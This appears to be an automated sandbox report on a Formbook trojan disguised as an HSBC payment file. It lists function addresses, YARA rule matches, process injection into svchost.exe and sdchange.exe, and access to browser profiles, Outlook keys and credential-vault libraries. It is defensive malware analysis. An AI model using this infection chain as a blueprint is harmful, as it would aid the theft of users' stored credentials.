Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D60F30	5_2_04D60F30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DE2F30	5_2_04DE2F30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D82F28	5_2_04D82F28
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D6E8F0	5_2_04D6E8F0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D268B8	5_2_04D268B8
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D4A840	5_2_04D4A840
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D42840	5_2_04D42840
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04E0A9A6	5_2_04E0A9A6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D429A0	5_2_04D429A0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D56962	5_2_04D56962
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D3EA80	5_2_04D3EA80
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF6BD7	5_2_04DF6BD7
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFAB40	5_2_04DFAB40
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D31460	5_2_04D31460
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFF43F	5_2_04DFF43F
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04E095C3	5_2_04E095C3
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DDD5B0	5_2_04DDD5B0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF7571	5_2_04DF7571
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF16CC	5_2_04DF16CC
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D85630	5_2_04D85630
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFF7B0	5_2_04DFF7B0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DEF0CC	5_2_04DEF0CC
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D470C0	5_2_04D470C0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF70E9	5_2_04DF70E9
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFF0E0	5_2_04DFF0E0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D4B1B0	5_2_04D4B1B0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04E0B16B	5_2_04E0B16B
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D2F172	5_2_04D2F172
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D7516C	5_2_04D7516C
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D5B2C0	5_2_04D5B2C0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DE12ED	5_2_04DE12ED
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D452A0	5_2_04D452A0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D8739A	5_2_04D8739A
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D2D34C	5_2_04D2D34C
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF132D	5_2_04DF132D
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFFCF2	5_2_04DFFCF2
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DB9C32	5_2_04DB9C32
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D5FDC0	5_2_04D5FDC0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF1D5A	5_2_04DF1D5A
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D43D40	5_2_04D43D40
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF7D73	5_2_04DF7D73
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D49EB0	5_2_04D49EB0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D03FD2	5_2_04D03FD2
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D03FD5	5_2_04D03FD5
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D41F92	5_2_04D41F92
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFFFB1	5_2_04DFFFB1
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFFF09	5_2_04DFFF09
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D438E0	5_2_04D438E0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DAD800	5_2_04DAD800
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D49950	5_2_04D49950
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D5B950	5_2_04D5B950
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DD5910	5_2_04DD5910
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DEDAC6	5_2_04DEDAC6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DDDAAC	5_2_04DDDAAC
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D85AA0	5_2_04D85AA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DE1AA3	5_2_04DE1AA3
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFFA49	5_2_04DFFA49
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DF7A46	5_2_04DF7A46
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DB3A6C	5_2_04DB3A6C
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DB5BF0	5_2_04DB5BF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D7DBF9	5_2_04D7DBF9
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04D5FB80	5_2_04D5FB80
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04DFFB76	5_2_04DFFB76
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E11800	5_2_02E11800
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E0C747	5_2_02E0C747
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E0C750	5_2_02E0C750
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E0A9F0	5_2_02E0A9F0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E0A994	5_2_02E0A994
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E0C970	5_2_02E0C970
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E14EB0	5_2_02E14EB0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E13090	5_2_02E13090
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E13049	5_2_02E13049
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E2B420	5_2_02E2B420
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04BEE78D	5_2_04BEE78D
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04BED7F8	5_2_04BED7F8
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04BEE2D6	5_2_04BEE2D6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_04BEE3F3	5_2_04BEE3F3

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: String function: 00748900 appears 42 times
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: String function: 00727DE1 appears 36 times
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: String function: 00740AE3 appears 70 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0392B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03975130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03987E54 appears 111 times
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: String function: 04DAEA12 appears 86 times
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: String function: 04D2B970 appears 280 times
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: String function: 04DBF290 appears 105 times
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: String function: 04D87E54 appears 111 times
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: String function: 04D75130 appears 58 times

Source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111499505.0000000003DED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rHSBCBank_Paymentswiftcpy.exe
Source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2109682729.0000000003BF3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rHSBCBank_Paymentswiftcpy.exe

Source: rHSBCBank_Paymentswiftcpy.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@11/8

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_0078A06A GetLastError,FormatMessageW,

0_2_0078A06A

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007781CB AdjustTokenPrivileges,CloseHandle,		0_2_007781CB
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_007787E1

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_0078B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0078B333

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_0079EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0079EE0D

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_007983BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_007983BB

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00724E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00724E89

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

File created: C:\Users\user\AppData\Local\Temp\aut25C.tmp

Jump to behavior

Source: rHSBCBank_Paymentswiftcpy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sdchange.exe, 00000005.00000002.3954559304.0000000003063000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3954559304.0000000003092000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2567888867.0000000003063000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rHSBCBank_Paymentswiftcpy.exe	ReversingLabs: Detection: 34%
Source: rHSBCBank_Paymentswiftcpy.exe	Virustotal: Detection: 41%

Source: unknown	Process created: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
Source: C:\Windows\SysWOW64\sdchange.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\sdchange.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\sdchange.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: rHSBCBank_Paymentswiftcpy.exe

Static file information: File size 1179648 > 1048576

Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: rHSBCBank_Paymentswiftcpy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: sdchange.pdbGCTL source: svchost.exe, 00000002.00000003.2347900801.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347954888.0000000003224000.00000004.00000020.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955254790.00000000007F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EqOUZfSIzU.exe, 00000004.00000000.2301808549.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3954823867.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111913806.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111155824.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283665751.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285797613.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2381381472.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2382802271.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111913806.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111155824.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2283665751.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285797613.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000005.00000003.2381381472.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2382802271.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: sdchange.exe, 00000005.00000002.3954559304.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.000000000532C000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000000.2449645139.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000122FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: sdchange.exe, 00000005.00000002.3954559304.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.000000000532C000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000000.2449645139.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000122FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: sdchange.pdb source: svchost.exe, 00000002.00000003.2347900801.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347954888.0000000003224000.00000004.00000020.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955254790.00000000007F8000.00000004.00000020.00020000.00000000.sdmp

